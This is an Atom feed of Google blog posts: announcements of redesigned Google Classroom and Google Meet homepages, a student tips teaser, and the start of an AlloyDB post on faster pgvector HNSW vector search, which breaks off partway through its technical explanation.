<?xml version='1.0' encoding='UTF-8'?>
<feed xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://blog.google/</id>
  <title>Google Blogs</title>
  <updated>2026-07-21T21:13:14.636273+00:00</updated>
  <author>
    <name>Google</name>
  </author>
  <link href="https://raw.githubusercontent.com/trvny/feeds/main/feedseek/feeds/feed_google.xml" rel="self"/>
  <link href="https://blog.google/" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="2.0.1">python-feedgen</generator>
  <icon>https://blog.google/favicon.ico</icon>
  <subtitle>Combined feed of Google's official blogs (The Keyword, Developers, Android, Chrome, Research, DeepMind, Cloud, and more)</subtitle>
  <entry>
    <id>https://blog.google/products-and-platforms/products/education/summer-productivity-tips-google-ai-tools</id>
    <title>13 Google tips for a fun, productive summer off from college</title>
    <updated>2026-07-21T20:00:00+00:00</updated>
    <content type="html">Illustration of a woman in front of a computer, a phone searching an image of a plant, a suitcase, and a video feed</content>
    <link href="https://blog.google/products-and-platforms/products/education/summer-productivity-tips-google-ai-tools" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-21T20:00:00+00:00</published>
    <media:group>
      <media:content url="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/12_Google_Productivity_Tips_her.max-600x600.format-webp.webp" type="image/webp" medium="image"/>
      <media:thumbnail url="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/12_Google_Productivity_Tips_her.max-600x600.format-webp.webp"/>
    </media:group>
    <link rel="enclosure" href="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/12_Google_Productivity_Tips_her.max-600x600.format-webp.webp" type="image/webp" length="0"/>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/07/redesigned-google-classroom-homepage-with-tailored-views-based-on-users-role.html</id>
    <title>Redesigned Google Classroom homepage with tailored views based on user’s role</title>
    <updated>2026-07-21T18:26:27+00:00</updated>
    <content type="html">&lt;p&gt;Soon, Google Classroom will introduce a redesigned homepage globally across all editions to help teachers, students, and administrators easily find relevant content, resources, and tools tailored to their specific roles. The updated interface transforms the homepage into a dynamic, centralized hub that more easily surfaces existing information and tools that were previously located in different areas of Classroom. Users can still access classes in the side navigation panel and a dedicated classes module on the homepage.&lt;/p&gt;&lt;p&gt;The new experience, which will begin rolling out on &lt;b&gt;July 27, 2026&lt;/b&gt;, is personalized based on a user's role and available features:&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;For teachers,&lt;/b&gt; a new dashboard gives actionable insights, highlights student classwork interactions, tracks assignment completion, and surfaces a feature spotlight to help discover instructional tools and resources.&lt;/li&gt;&lt;/ul&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4z5Jr1F8pgnppJhAO67dlTGF8_s396SdXAfVwirKZRyDRNWel62ZKjkHhyem1myWeDm_W1EZqy9W0aXp8ag-Mhi0gcyRpcH3D9uW_T7XbpdHUodupn25qr0jOknsQ54WM6Zq8THkBpvrmz5XCK_Ujn61JDcQlssIER4Dm_R-f49Tdzq4lp7e_OWijIZE/s2048/Redesigned%20Google%20Classroom%20homepage%20with%20tailored%20views%20based%20on%20user%E2%80%99s%20role%20-%205844%20-%201.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4z5Jr1F8pgnppJhAO67dlTGF8_s396SdXAfVwirKZRyDRNWel62ZKjkHhyem1myWeDm_W1EZqy9W0aXp8ag-Mhi0gcyRpcH3D9uW_T7XbpdHUodupn25qr0jOknsQ54WM6Zq8THkBpvrmz5XCK_Ujn61JDcQlssIER4Dm_R-f49Tdzq4lp7e_OWijIZE/s1600/Redesigned%20Google%20Classroom%20homepage%20with%20tailored%20views%20based%20on%20user%E2%80%99s%20role%20-%205844%20-%201.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;For students,&lt;/b&gt; a dedicated ‘Enrolled’ view reminds learners of coursework that is due soon and helps them manage their deadlines.&lt;/li&gt;&lt;/ul&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2DeMpYAsE8KjpOol-GTGgKsRfuDX_lWVbVBUuwgqjhYFPNJmrjY2PvBeYFpoD41VPtPap2B1bdgG4jy6b8-ih2SpV-A7gj2X3ak4cHe-L0Ymq0PY8DwJraldsEDBEnwasX56dzjnj_dvOSsY1RXTNFx56JvmWnRGMCBiKQVimy9Kb4JwC9F4XJ8IZwUc/s2048/Redesigned%20Google%20Classroom%20homepage%20with%20tailored%20views%20based%20on%20user%E2%80%99s%20role%20-%205844%20-%202.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2DeMpYAsE8KjpOol-GTGgKsRfuDX_lWVbVBUuwgqjhYFPNJmrjY2PvBeYFpoD41VPtPap2B1bdgG4jy6b8-ih2SpV-A7gj2X3ak4cHe-L0Ymq0PY8DwJraldsEDBEnwasX56dzjnj_dvOSsY1RXTNFx56JvmWnRGMCBiKQVimy9Kb4JwC9F4XJ8IZwUc/s1600/Redesigned%20Google%20Classroom%20homepage%20with%20tailored%20views%20based%20on%20user%E2%80%99s%20role%20-%205844%20-%202.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;For school leaders and IT administrators, &lt;/b&gt;the homepage provides a centralized view to monitor high-level performance analytics, access shortcuts for backend administrative settings, and discover relevant tools to support educators and staff.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_5pTQCpASv_YNL4r0fWvhMZJLsDay8uBJUNu3lmdHX5hVnXd2xLZ9RxGk6jOeSuqdspW4iqCa-evGdJc3zVG6vF0mA_rE1DeOsMgzGGh3xZyh5YGM-mX3LcgT4xLdXjbuex8rkHkt-YtL5KdSxJ6O-tOUmhi3jJwhwjZ5AHe3pNeKnnGHkZ_pXyJXnEA/s2048/Redesigned%20Google%20Classroom%20homepage%20with%20tailored%20views%20based%20on%20user%E2%80%99s%20role%20-%205844%20-%203.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_5pTQCpASv_YNL4r0fWvhMZJLsDay8uBJUNu3lmdHX5hVnXd2xLZ9RxGk6jOeSuqdspW4iqCa-evGdJc3zVG6vF0mA_rE1DeOsMgzGGh3xZyh5YGM-mX3LcgT4xLdXjbuex8rkHkt-YtL5KdSxJ6O-tOUmhi3jJwhwjZ5AHe3pNeKnnGHkZ_pXyJXnEA/s1600/Redesigned%20Google%20Classroom%20homepage%20with%20tailored%20views%20based%20on%20user%E2%80%99s%20role%20-%205844%20-%203.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Users who have multiple roles (such as a teacher taking a professional development class) can easily change their view dashboard by clicking into another role (for example, Teaching, Enrolled, or Admin). When a user loads the homepage, it returns to the previous role view.&lt;/p&gt;&lt;p&gt;To help users control their view and focus on what matters most to them, all new homepage modules are collapsible.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMrTE36s6kLkXAffV-F1O0SzB3un4nX0Pd_lFGBuCFl2Ag9dlPY53pOSeJQQMmdn2mWYpUpSxMIN4kGLgO7NDXkiOEQz0I0cT1Bv-taqWkp5I1pmmzAcB2nonL3qz5OVwCBRpYwvpl09UCiLbnbERcpmsUontJsPtvIL2kz2SfZQCTQNVIuw3rk3Dftp0/s1800/Redesigned%20Google%20Classroom%20homepage%20with%20tailored%20views%20based%20on%20user%E2%80%99s%20role%20-%205844%20-%204.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMrTE36s6kLkXAffV-F1O0SzB3un4nX0Pd_lFGBuCFl2Ag9dlPY53pOSeJQQMmdn2mWYpUpSxMIN4kGLgO7NDXkiOEQz0I0cT1Bv-taqWkp5I1pmmzAcB2nonL3qz5OVwCBRpYwvpl09UCiLbnbERcpmsUontJsPtvIL2kz2SfZQCTQNVIuw3rk3Dftp0/s1600/Redesigned%20Google%20Classroom%20homepage%20with%20tailored%20views%20based%20on%20user%E2%80%99s%20role%20-%205844%20-%204.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;i&gt;Please note that not all features and views will be available to all users. Eligibility is determined by the user’s role, feature access, account type, and settings.&lt;/i&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;There is no admin control for the new Classroom homepage. Gemini and &lt;a href="https://blog.google/innovation-and-ai/products/gemini-notebook/notebooklm-gemini-notebook/" target="_blank"&gt;Gemini Notebook&lt;/a&gt; features will only appear if the user is in an OU with Gemini in Classroom, Gemini app, and/or Gemini Notebook enabled. Visit the Help Center to learn about managing access to &lt;a href="http://support.google.com/a/answer/16291887" target="_blank"&gt;Gemini in Classroom&lt;/a&gt;, &lt;a href="https://knowledge.workspace.google.com/admin/gemini/turn-the-gemini-app-on-or-off" target="_blank"&gt;Gemini app&lt;/a&gt;, &lt;a href="https://knowledge.workspace.google.com/admin/users/access/turn-notebooklm-on-or-off-for-users" target="_blank"&gt;Gemini Notebook&lt;/a&gt;, and the option to turn these services on or off for users in the Admin console.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;There is no end user setting for the new Classroom homepage. Visit the Help Center to &lt;a href="https://support.google.com/edu/classroom/answer/17231999?hl=en&amp;amp;ref_topic=11987016&amp;amp;sjid=11637609375205384704-NC" target="_blank"&gt;learn more about the new Classroom homepage&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains:&lt;/a&gt; Full rollout (1-3 days for visibility) starting July 27, 2026&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available to all Google Workspace customers, Workspace Individual subscribers, and users with personal Google accounts&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Classroom Help: &lt;a href="https://support.google.com/edu/classroom/answer/17231999?hl=en&amp;amp;ref_topic=11987016&amp;amp;sjid=11637609375205384704-NC" target="_blank"&gt;Navigate your Classroom Homepage&lt;/a&gt;&lt;/li&gt;&lt;li&gt;2026: What’s New in Google for Education: &lt;a href="https://docs.google.com/presentation/d/1nJAZYHrAe-K0OOqZ3HA1-YrY6aNO5yOIV5MosOkaIOU/preview?slide=id.g3ef4e3366dc_69_1186#slide=id.g3ef4e3366dc_69_1186" target="_blank"&gt;Overview of Classroom Homepage&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/07/redesigned-google-classroom-homepage-with-tailored-views-based-on-users-role.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-07-21T18:26:27+00:00</published>
    <media:group>
      <media:content url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4z5Jr1F8pgnppJhAO67dlTGF8_s396SdXAfVwirKZRyDRNWel62ZKjkHhyem1myWeDm_W1EZqy9W0aXp8ag-Mhi0gcyRpcH3D9uW_T7XbpdHUodupn25qr0jOknsQ54WM6Zq8THkBpvrmz5XCK_Ujn61JDcQlssIER4Dm_R-f49Tdzq4lp7e_OWijIZE/s72-c/Redesigned%20Google%20Classroom%20homepage%20with%20tailored%20views%20based%20on%20user%E2%80%99s%20role%20-%205844%20-%201.png" type="image/png" medium="image"/>
      <media:thumbnail url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4z5Jr1F8pgnppJhAO67dlTGF8_s396SdXAfVwirKZRyDRNWel62ZKjkHhyem1myWeDm_W1EZqy9W0aXp8ag-Mhi0gcyRpcH3D9uW_T7XbpdHUodupn25qr0jOknsQ54WM6Zq8THkBpvrmz5XCK_Ujn61JDcQlssIER4Dm_R-f49Tdzq4lp7e_OWijIZE/s72-c/Redesigned%20Google%20Classroom%20homepage%20with%20tailored%20views%20based%20on%20user%E2%80%99s%20role%20-%205844%20-%201.png"/>
    </media:group>
    <link rel="enclosure" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4z5Jr1F8pgnppJhAO67dlTGF8_s396SdXAfVwirKZRyDRNWel62ZKjkHhyem1myWeDm_W1EZqy9W0aXp8ag-Mhi0gcyRpcH3D9uW_T7XbpdHUodupn25qr0jOknsQ54WM6Zq8THkBpvrmz5XCK_Ujn61JDcQlssIER4Dm_R-f49Tdzq4lp7e_OWijIZE/s72-c/Redesigned%20Google%20Classroom%20homepage%20with%20tailored%20views%20based%20on%20user%E2%80%99s%20role%20-%205844%20-%201.png" type="image/png" length="0"/>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/07/a-centralized-hub-for-meeting-resources-on-the-new-Google-Meet-homepage.html</id>
    <title>A centralized hub for meeting resources on the new Google Meet homepage</title>
    <updated>2026-07-21T18:20:41+00:00</updated>
    <content type="html">&lt;p&gt;Finding the right notes or attachments for a meeting shouldn't feel like a scavenger hunt. We’re introducing a revamped &lt;a href="http://meet.google.com" target="_blank"&gt;Google Meet homepage&lt;/a&gt; on the web to help you stay organized and prepared throughout your entire meeting workflow.&lt;/p&gt;&lt;p&gt;The new homepage provides a centralized view of your meeting agenda and essential artifacts, allowing you to:&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Prepare effectively:&lt;/b&gt; Quickly access meeting descriptions and calendar attachments for upcoming calls.&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Follow through easily: &lt;/b&gt;Find meeting notes, recordings, and transcripts from past meetings without digging through your inbox or Drive.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Manage your time:&lt;/b&gt; Use the new week and month navigators to look ahead at your schedule or revisit previous discussions.&lt;/li&gt;&lt;/ul&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhj97q6323Azup-mSVmBw7RHnzSg7_xZtEyApn_SM4M_BFl7r0rc_z0hIYwSlHCI7-MMg_yzFKMZNj8e25olawT_ETkeezqA5rTj4qkUY5NxxMUi2BtikHg_c5-G29uienFKv_nNemimnK7J7lTrfnA8qnJcWoaQjxzNsRbWYkkvL6lGd7C2-yYEcmFY98/s1280/A%20centralized%20hub%20for%20meeting%20resources%20on%20the%20new%20Google%20Meet%20homepage%20-%206698.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhj97q6323Azup-mSVmBw7RHnzSg7_xZtEyApn_SM4M_BFl7r0rc_z0hIYwSlHCI7-MMg_yzFKMZNj8e25olawT_ETkeezqA5rTj4qkUY5NxxMUi2BtikHg_c5-G29uienFKv_nNemimnK7J7lTrfnA8qnJcWoaQjxzNsRbWYkkvL6lGd7C2-yYEcmFY98/s1600/A%20centralized%20hub%20for%20meeting%20resources%20on%20the%20new%20Google%20Meet%20homepage%20-%206698.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;There is no admin control for this feature. The new homepage experience will be available to all users with access to Google Meet on the web.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;The new homepage experience will be available to all Meet users on the web. Visit meet.google.com to get started.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release domains:&lt;/a&gt; Gradual rollout (up to 15 days for feature visibility) starting on July 21, 2026&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Scheduled Release domains:&lt;/a&gt; Gradual rollout (up to 15 days for feature visibility) starting on August 17, 2026&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available to all Google Workspace customers and Workspace Individual subscribers&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Meet: &lt;a href="http://meet.google.com" target="_blank"&gt;Google Meet Homepage&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Meet Help: &lt;a href="https://support.google.com/meet/answer/17302648" target="_blank"&gt;Use the Google Meet homepage&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/07/a-centralized-hub-for-meeting-resources-on-the-new-Google-Meet-homepage.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-07-21T18:20:41+00:00</published>
    <media:group>
      <media:content url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhj97q6323Azup-mSVmBw7RHnzSg7_xZtEyApn_SM4M_BFl7r0rc_z0hIYwSlHCI7-MMg_yzFKMZNj8e25olawT_ETkeezqA5rTj4qkUY5NxxMUi2BtikHg_c5-G29uienFKv_nNemimnK7J7lTrfnA8qnJcWoaQjxzNsRbWYkkvL6lGd7C2-yYEcmFY98/s72-c/A%20centralized%20hub%20for%20meeting%20resources%20on%20the%20new%20Google%20Meet%20homepage%20-%206698.png" type="image/png" medium="image"/>
      <media:thumbnail url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhj97q6323Azup-mSVmBw7RHnzSg7_xZtEyApn_SM4M_BFl7r0rc_z0hIYwSlHCI7-MMg_yzFKMZNj8e25olawT_ETkeezqA5rTj4qkUY5NxxMUi2BtikHg_c5-G29uienFKv_nNemimnK7J7lTrfnA8qnJcWoaQjxzNsRbWYkkvL6lGd7C2-yYEcmFY98/s72-c/A%20centralized%20hub%20for%20meeting%20resources%20on%20the%20new%20Google%20Meet%20homepage%20-%206698.png"/>
    </media:group>
    <link rel="enclosure" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhj97q6323Azup-mSVmBw7RHnzSg7_xZtEyApn_SM4M_BFl7r0rc_z0hIYwSlHCI7-MMg_yzFKMZNj8e25olawT_ETkeezqA5rTj4qkUY5NxxMUi2BtikHg_c5-G29uienFKv_nNemimnK7J7lTrfnA8qnJcWoaQjxzNsRbWYkkvL6lGd7C2-yYEcmFY98/s72-c/A%20centralized%20hub%20for%20meeting%20resources%20on%20the%20new%20Google%20Meet%20homepage%20-%206698.png" type="image/png" length="0"/>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/databases/supercharge-pgvector-4x-faster-hnsw-with-alloydb</id>
    <title>Supercharging pgvector: 4x faster HNSW vector search with AlloyDB</title>
    <updated>2026-07-21T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;a href="https://cloud.google.com/alloydb"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;AlloyDB&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is a fully managed, PostgreSQL-compatible database service built for your most demanding enterprise workloads. It combines the best of open source PostgreSQL with Google’s advanced technology, offering massive scalability, high availability, and native AI capabilities. It serves as a performant relational store, a unified backend for vector and full text search, and an analytics engine that is up to 100x faster than standard PostgreSQL. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Vector search is the foundation of modern AI and Retrieval Augmented Generation (RAG) applications. For developers using AlloyDB and other PostgreSQL databases, &lt;/span&gt;&lt;a href="https://github.com/pgvector/pgvector" rel="noopener" target="_blank"&gt;&lt;code style="text-decoration: underline; vertical-align: baseline;"&gt;pgvector&lt;/code&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is a widely adopted extension for storing, indexing, and querying vector embeddings, and HNSW (Hierarchical Navigable Small World) is a highly efficient graph-based algorithm designed for approximate nearest neighbor search across multi-layered structures. With &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/ai/accelerate-with-ce"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;columnar engine accelerated HNSW&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; in AlloyDB (now in preview), you can achieve up to 4x higher queries per second (QPS) for vector search compared to standard PostgreSQL HNSW.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Enterprise AI applications face a constant trade-off between speed and accuracy. When searching through millions or billions of vectors, maximizing Queries per Second (QPS) without sacrificing search quality (recall) is critical for scaling production workloads. The PostgreSQL &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;pgvector&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; extension offers HNSW as one of the indexes that can speed up Approximate Nearest Neighbor (ANN) searches. Let’s dive deep into how AlloyDB solves the speed vs. accuracy trade-off.  &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Note: While this post focuses on HNSW performance, it’s worth noting that HNSW is just one part of AlloyDB’s advanced vector toolkit. AlloyDB also features &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/ai/create-scann-index"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;ScaNN&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;—a cutting-edge index backed by over 14 years of Google Research—giving you the flexibility to choose the perfect index for your workload. Additionally, for use cases demanding absolute precision, standard k-nearest neighbor (KNN) search is always available for 100% recall. Check out our &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/ai/choose-index-strategy"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Choose a Vector Index Guide&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to see how they stack up.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-aside"&gt;&lt;dl&gt;
    &lt;dt&gt;aside_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;title&amp;#x27;, &amp;#x27;Get started with a 30-day AlloyDB free trial instance&amp;#x27;), (&amp;#x27;body&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fd949d92cd0&amp;gt;), (&amp;#x27;btn_text&amp;#x27;, &amp;#x27;Start building for free&amp;#x27;), (&amp;#x27;href&amp;#x27;, &amp;#x27;http://goo.gle/try_alloydb&amp;#x27;), (&amp;#x27;image&amp;#x27;, None)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;First, what is the AlloyDB columnar engine? &lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/columnar-engine/about"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;AlloyDB columnar engine&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is a built-in, in-memory cache that automatically stores frequently queried data in a specialized, scan-optimized columnar format. It allows AlloyDB to handle heavy analytical queries up to 100x faster than standard PostgreSQL. Additionally, it accelerates ANN searches by storing the index in memory, using a vectorized memory layout for fast traversals, and bypassing standard PostgreSQL buffer manager overhead. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Performance visualization&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To understand the real-world performance characteristics of columnar engine Accelerated HNSW, we plotted standard QPS vs Recall curves for the GloVe 100 Angular dataset by searching more than 1M records with a limit of 100.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Running this &lt;/span&gt;&lt;a href="https://colab.research.google.com/github/GoogleCloudPlatform/python-docs-samples/blob/main/alloydb/notebooks/columnar_engine_accelerated_hnsw_vector_search_benchmark.ipynb" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;benchmark script&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; yields the following visualization:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="1" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/1_r57mjyN.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Note: These measurements were taken on an AlloyDB C4A 16vCPU machine. Due to the inherent randomness in HNSW graph building, results may slightly vary across runs.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The data reveals two transformative benefits:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Massive performance throughput gains: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;For any given target recall (e.g. 0.95), QPS is increased by approximately &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;4.2x to 4.9x&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. This allows you to handle significantly more concurrent vector searches on the same hardware.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Significant recall (accuracy) improvement: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Conversely, at a fixed QPS level, columnar engine accelerated HNSW provides a substantial boost in recall. For example, we saw that at ~350 QPS (in the above chart), enabling the columnar engine improves recall from roughly &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;0.78 to over 0.94 &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;– a &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;0.163 recall gain&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. This means your AI applications get much more accurate results without any latency impact.&lt;/span&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;It is important to note that the baseline (blue line) already represents the index being fully cached in the PostgreSQL shared buffer cache. The performance gains shown here are not the result of moving data from disk to RAM, but rather the result of a more efficient memory architecture.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;How it works: Columnar engine Accelerated HNSW&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In standard PostgreSQL architectures, index operations utilize the shared buffer cache. Even when data is fully in-memory, the database still incurs significant overhead from the buffer manager, which must handle operations such as page pinning and unpinning, lock acquisition, buffer table lookups, and Least Recently Used (LRU) management.&lt;/span&gt;&lt;/p&gt;
